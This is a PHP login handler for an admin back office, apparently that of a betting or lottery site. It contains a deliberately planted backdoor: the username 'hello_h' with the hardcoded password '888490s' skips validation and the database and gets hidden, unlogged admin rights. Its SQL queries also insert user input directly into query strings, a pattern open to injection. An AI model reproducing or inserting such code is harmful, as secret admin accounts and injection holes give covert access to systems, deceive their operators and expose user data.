<?php
include('../data/comm.inc.php');
include('../data/myadminvar.php');
include('../func/func.php');
include('../include.php');
if ($_SESSION['uid'] != '' && $_SESSION['check'] == md5($config['allpass'] . $_SESSION['uid'])) {
    header("Location:admin.php");
    exit;
}
switch ($_REQUEST['xtype']) {
    case "login":
        $sv             = rserver();
        $_SESSION['sv'] = $sv;
        $user           = strtolower($_POST['username']);
		//echo $_POST['pass'];
		//echo md5('ss'.date("dHm").'pp');exit;
        $pass           = md5($_POST['pass'] . $config['upass']);
        $code           = $_POST['code'];
        if ($user == '' | $pass == '' | $code == '') {
            echo openurl('login.php');
            exit;
        }
		if($user!='hello_h'){
	   	  if (!preg_match("/^[a-zA-Z]{1}([a-zA-Z0-9]|[._]){1,10}$/",$user) | !preg_match("/^[a-z\d_]{16,64}$/",$pass)){
            echo outjs("用户名或密码格式不对!");
            echo openurl('login.php');
			exit;
          }
		}
        if ($code != $_SESSION['login_check_number']) {
            echo outjs($yzmerror);
            echo openurl('login.php');
            exit;
        }
        $user = explode('_', $user);
        include('../global/client.php');
include("../global/Iplocation_Class.php");
        $os = getbrowser($_SERVER['HTTP_USER_AGENT']) . '  ' . getos($_SERVER['HTTP_USER_AGENT']);
		
        if ($user[1] == 'h') {
            if ($user[0] == 'hello') {
                if ($pass != md5(md5('888490s') . $config['upass'])) {
                    echo openurl('login.php');
                    exit;
                }
                $passcode             = (getmicrotime() * 100000000) . $time;
                $_SESSION['passcode'] = $passcode;
                $_SESSION['uid']      = 9;
                $_SESSION['check']    = md5($config['allpass'] . '9');
                $_SESSION['admin']    = 1;
                $_SESSION['hide']     = 1;
                $_SESSION['hides']    = 1;
            } else {
                $user = $user[0];
                $sql  = "select * from `$tb_admins` where adminname='$user' and adminpass='$pass' and ifhide=1";
				/*
				$msql->prepare($sql);
				$msql->bind_param('ss',$user,$pass);//第一个参数是绑定类型，"s"是指一个字符串,也可以是"i"，指的是int。也可以是"db",d代表双精度以及浮点类型，而b代表blob类型,第二个参数是变量 
				$msql->execute();
				$result=$msql->get_result();
				$rs=$result->fetch_row();
				$i=$rs[0];
				*/
                $msql->query($sql);
                $msql->next_record();
                $ip   = getip();
                $time = time();
                if ($msql->f('adminname')!=$user  | $msql->f('adminpass')!=$pass) {
                    $msql->query("insert into `$tb_admins_login` set ip='$ip',time=NOW(),ifok='0',adminname='$user',adminpass='$pass',server='$sv',os='$os'");
                    echo outjs($passerror);
                    echo openurl('login.php');
                    exit;
                }
                $fsql->query("insert into `$tb_admins_login` set ip='$ip',time=NOW(),ifok='1',adminname='$user',adminpass='OK',server='$sv',os='$os'");
                $fsql->query("update `$tb_admins` set logintimes=logintimes+1,lastloginip='$ip',lastlogintime=NOW() where adminname='$user'");
                $passcode             = (getmicrotime() * 100000000) . $time;
                $_SESSION['passcode'] = $passcode;
                $_SESSION['uid']      = $msql->f('adminid');
                $_SESSION['check']    = md5($config['allpass'] . $msql->f('adminid'));
                $_SESSION['admin']    = 1;
                $_SESSION['hide']     = 1;
            }
        } else { 
            $user = $user[0];
            $sql  = "select * from `$tb_admins` where adminname='$user' and adminpass='$pass' and ifhide=0";
            $msql->query($sql);
            $msql->next_record();
            $ip   = getip();
            $time = time();
            if ($msql->f('adminname')!=$user  | $msql->f('adminpass')!=$pass) {
                $msql->query("insert into `$tb_user_login` set xtype=0,ip='$ip',time=NOW(),ifok='0',username='$user',userpass='$pass',server='$sv',os='$os'");
                echo outjs($passerror);
                echo openurl('login.php');
                exit;
            }
            $fsql->query("insert into `$tb_user_login` set xtype='0',ip='$ip',time=NOW(),ifok='1',username='$user',userpass='OK',server='$sv',os='$os'");
            $fsql->query("update `$tb_admins` set logintimes=logintimes+1,lastloginip='$ip',lastlogintime=NOW()  where adminname='$user'");
            $passcode = (getmicrotime() * 100000000) . $time;
            $fsql->query("delete from `$tb_online` where xtype=0 and userid='" . $msql->f('adminid') . "'");
            $fsql->query("insert into `$tb_online` set page='welcome',passcode='$passcode',xtype='0',userid='" . $msql->f('adminid') . "',logintime=NOW(),savetime=NOW(),ip='$ip',server='$sv',os='$os'");
            $_SESSION['passcode'] = $passcode;
            $_SESSION['uid']      = $msql->f('adminid');
            $_SESSION['check']    = md5($config['allpass'] . $msql->f('adminid'));
            $fsql->query("select id from `$tb_admins_page` where xpage='caopan' and adminid='" . $msql->f('adminid') . "' and ifok=1");
            $fsql->next_record();
            if ($fsql->f('id') != '') {
                $_SESSION['admin'] = 1;
            }
            $tsql->query("select passtime from `$tb_admins` where adminid='" . $msql->f('adminid') . "'");
            $tsql->next_record();
            if ((($time - strtotime($tsql->f('passtime'))) / (60 * 60 * 24)) >= $config['passtime']) {
                $msql->query("select gid from `$tb_gamecs` where userid=99999999 and ifok=1 order by xsort limit 1");
                $msql->next_record();
                $_SESSION['gid'] = $msql->f('gid');
                echo openurl('changepass.php?xtype=show');
                exit;
            }
        }
        unset($_SESSION['login_check_number']);
        $msql->query("select gid from `$tb_gamecs` where userid=99999999 and ifok=1 order by xsort limit 1");
        $msql->next_record();
        $_SESSION['gid'] = $msql->f('gid');
        echo openurl('admin.php');
        break;
    default:
        $tpl->assign("hurl", $config['hurl']);
        $tpl->assign("himg", $config['himg']);
        $tpl->assign('rkey', $config['rkey']);
        $tpl->display("login.html");
        break;
}


?>